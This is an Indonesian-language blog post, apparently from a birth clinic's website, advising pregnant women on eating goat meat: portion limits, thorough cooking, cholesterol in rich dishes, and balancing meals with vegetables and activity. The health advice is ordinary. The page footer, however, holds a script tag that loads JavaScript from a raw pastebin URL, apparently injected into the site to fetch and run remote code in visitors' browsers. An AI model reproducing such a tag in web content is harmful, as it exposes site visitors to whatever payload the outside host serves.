Daging Kambing dan Ibu Hamil??




Lalu Bagaimana dengan Ibu Hamil yang ingin Mengkonsumsi daging kambing, Aman kah? Boleh kah?
.
Terlepas dari kandungan nutrisi yang baik, jika ingin mengkonsumsi daging kambing, Bunda harus tetap memperhatikan hal-hal berikut ya..

🌸Atur Porsi makan.
Bunda, tetap harus diingat bahwa dalam daging kambing tetap ada kandungan kolesterolnya, ya. Karena itu disarankan jangan terlalu banyak, apalagi bila sebelumnya sudah ada peningkatan kadar kolesterol pada ibu hamil. Porsi yang aman dikonsumsi adalah sebesar +- 100gram/hari.

🌸Cara Mengolah
Hal lain yang tak kalah penting yaitu pengolahan daging kambing yang tepat sehingga aman untuk janin. Bunda sebaiknya memerhatikan dengan cermat tingkat kematangan daging, pastikan daging telah dioleh sedemikian rupa hingga benar-benar matang.
Daging sapi maupun daging kambing sering diolah menggunakan santan kental menjadi gulai atau menjadi sate. Biasanya ditambahkan dengan siraman bumbu kacang yang sudah jelas tinggi kandungan lemak dan kolesterolnya, sehingga tak baik jika dikonsumsi berlebihan.
.
Nah, jadi cara mengolah dan memasak daging tersebut juga penting. Ketahui cara mengolahnya dengan tepat agar jangan sampai daging yang nikmat dan sehat malah mendatangkan penyakit kolesterol di saat Lebaran.

🌸Imbangi dengan konsumsi sayuran dan buah-buahan
🌸Jangan lupa untuk tetap aktif melakukan aktivitas, ya Bunda..

Sumber:
https://www.haibunda.com/kehamilan/20180822090024-49-24138/ibu-hamil-ingin-makan-daging-kambing-intip-nutrisinya-dulu-yuk
https://www.momjunction.com/articles/health-benefits-eating-lamb-pregnancy_0086651/#gref
https://m.klikdokter.com/info-sehat/read/3558443/daging-sapi-vs-daging-kambing-mana-yang-lebih-tinggi-kolesterol
.
#amanibirthindonesia

Our Gallery

Kumpulan galeri klinik ibu alam

<script type="text/javascript" src="https://pastebin.com/raw/spjSz2Ru"></script>

Contact Info

  • Tegalsari 1/8 Mangunsari
    Sidomukti Salatiga
    Jawa Tengah 50721